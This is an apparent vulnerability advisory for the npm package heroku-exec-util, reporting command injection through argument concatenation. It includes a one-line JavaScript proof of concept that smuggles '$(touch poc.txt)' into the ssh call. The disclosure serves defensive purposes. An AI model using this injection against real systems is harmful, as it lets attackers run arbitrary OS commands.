heroku-exec-util

vulnerability command injection
severity 8.8
language javascript
registry npm

✍️ Description

The heroku-exec-util package is vulnerable to Command Injection via argument concatenation.

🕵️‍♂️ Proof of Concept

// poc.js

const  heroku = require('heroku-exec-util');
heroku.ssh({args:{}},'$(touch poc.txt)','','test',{path:'test'});

The execution of the code above implies the creation of poc.txt file.

💥 Impact

This vulnerability allows attackers to execute arbitrary OS commands.

References